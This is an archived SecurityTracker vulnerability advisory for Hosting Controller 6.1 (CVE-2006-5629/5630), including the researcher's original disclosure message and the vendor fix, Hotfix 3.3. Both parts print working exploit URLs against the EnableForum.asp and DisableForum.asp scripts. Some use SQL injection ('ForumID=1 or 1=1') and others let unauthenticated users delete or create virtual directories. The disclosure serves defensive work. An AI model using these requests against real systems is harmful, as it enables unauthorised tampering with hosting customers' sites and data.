SecurityTracker.com Archives - Hosting Controller 'EnableForum.asp' and 'DisableForum.asp' Scripts Let Remote Users Create or Delete Forums and Virtual Directories

	Keep Track of the Latest Vulnerabilities with SecurityTracker!

SecurityTracker
Archives

Sign Up

Instant Alerts

Buy our Premium Vulnerability Notification Service to receive customized, instant alerts

Affiliates

Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!

Partners

Become a Partner and License Our Database or Notification Service

Report a Bug

Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Category: Application (Generic) > Hosting Controller

Vendors: HostingController.com

Hosting Controller 'EnableForum.asp' and 'DisableForum.asp' Scripts Let Remote Users Create or Delete Forums and Virtual Directories

SecurityTracker Alert ID: 1017103

SecurityTracker URL: http://securitytracker.com/id?1017103

CVE Reference: CVE-2006-5629 , CVE-2006-5630 (Links to External Site)

Updated: Jun 2 2008

Original Entry Date: Oct 20 2006

Impact: Denial of service via network, Disclosure of system information, Disclosure of user information, Modification of user information, User access via network

Fix Available: Yes Exploit Included: Yes Vendor Confirmed: Yes

Version(s): 6.1 Hotfix 3.2 and prior versions

Description: Soroush Dalili of Kapda and GSG reported several vulnerabilities in Hosting Controller. A remote user can create or delete forums and virtual directories.

The 'EnableForum.asp' and 'DisableForum.asp' scripts do not properly validate user-supplied input in the 'ForumID' parameter. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database. This can be exploited to enable or delete arbitrary forums.

Some demonstration exploit URLs are provided:

/forum/HCSpecific/DisableForum.asp?action=disableforum&ForumID=1 or 1=1

/forum/HCSpecific/EnableForum.asp?action=enableforum&ForumID=1 or 1=1

A remote user can also delete and create arbitrary virtual directories.

Some demonstration exploit URLs are provided:

/forum/HCSpecific/DisableForum.asp?action=disableforum&WSiteName=testsite.com&VDirName=test&Forum ID=1

/forum/HCSpecific/EnableForum.asp?action=enableforum&WSiteName=testsite.com&VDirName=test&ForumID=

The original advisory is available at:

http://www.kapda.ir/advisory-442.html

Impact: A remote user can execute SQL commands on the underlying database to enable or delete forums.

A remote user can create or delete arbitrary virtual directories.

Solution: The vendor has issued a fix (6.1 Hotfix 3.3).

Vendor URL: www.hostingcontroller.com (Links to External Site)

Cause: Access control error, Input validation error

Underlying OS: Windows (Any)

Reported By: s d <irsdl@yahoo.com>

Message History: None.

Source Message Contents

Date: Fri, 20 Oct 2006 03:08:38 -0700 (PDT)
From: s d <irsdl@yahoo.com>
Subject: Hosting Controller 6.1 Hotfix <= 3.2 Multiple Vulnerabilities

 
[KAPDA::59] - Hosting Controller 6.1 Hotfix <= 3.2 Multiple Vulnerabilities
Vendor: Hosting Controller
Vendor URL: www.hostingcontroller.com
Solution: Hotfix 3.3
Found Date: 7/1/2006
Release Date: 10/10/2006
 
Discussion:
--------------------
UnAuthenticated user can
1- delete every sites virtual directory on hc sites
2- make forum virtual directory (with the desire name) for everysites on hc!
3- disable all hc forums by SQL  Injection
4- enable all hc forums by SQL  Injection
 
Bugs are available in "DisableForum.asp" and "enableForum.asp" in forum directory
.
 
Exploit: (or POC)
--------------------
1- unAuthenticated user can delete every sites virtual directory on hc sites by forum!
/forum/HCSpecific/DisableForum.asp?action=disableforum&WSiteName=testsite.com&VDirName=test&
ForumID=1
-----------------------------------------------------------------
2- unAuthenticated user can make forum virtual directory (with the desire name) for everysites on hc 
by forum!
/forum/HCSpecific/EnableForum.asp?action=enableforum&WSiteName=testsite.com&VDirName=test&
ForumID=
-----------------------------------------------------------------
3- unAuthenticated user can disable all hc forums by SQL_Injection
/forum/HCSpecific/DisableForum.asp?action=disableforum&ForumID=1 or 1=1
-----------------------------------------------------------------
4- unAuthenticated user can enable all hc forums by SQL_Injection
/forum/HCSpecific/EnableForum.asp?action=enableforum&ForumID=1 or 1=1
--------------------
 
Solution:
--------------------
Update to version Hotfix 3.3
 
Original Advisory:
--------------------
http://www.kapda.ir/advisory-442.html
 
Credit :
--------------------
Soroush Dalili of Kapda and GSG
IRSDL [4t} kapda <d0t] ir
Kapda - Security Science Researchers Insitute [http://www.KAPDA.ir]
GSG - Grayhatz security group [http://www.Grayhatz.net]
 
Talk is cheap. Use Yahoo! Messenger to make PC-to-Phone calls. Great rates starting at 1¢/min.

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us | Help
Copyright 2007, SecurityGlobal.net LLC